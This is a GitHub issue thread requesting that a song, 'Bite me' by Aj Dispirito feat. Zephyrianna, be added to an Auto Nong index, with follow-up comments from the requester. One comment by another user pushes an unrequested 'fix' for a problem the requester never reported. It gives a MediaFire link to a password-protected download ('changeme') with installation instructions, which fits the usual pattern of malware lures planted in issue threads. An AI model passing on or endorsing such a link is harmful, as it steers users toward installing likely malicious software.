### ISSUE TITLE
Add Bite me by Aj Dispirito feat. Zephyrianna

### ISSUE THREAD

**Issue by JPDragonIV** [FlafyDev/auto-nong-indexes#3475]
### Song Name

Bite me

### Artist Name

Aj Dispirito feat. Zephyrianna

### Source

Youtube

### Youtube Link

D7_2_j6-VfQ

### Song ID

1088357

### Start Offset [ms]

0

### Extra

Created from Auto Nong.
Created for level: I'm going to make a level with it
Downloaded: Yes

**Comment by JPDragonIV** [comment]
Probably not that high priority, since I'm just building the level currently

**Comment by JPDragonIV** [comment]
I'll probably say something when I'm done with the level

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by JPDragonIV** [comment]
cool

**Comment by JPDragonIV** [comment]
Probably could've waited until I was done for this request
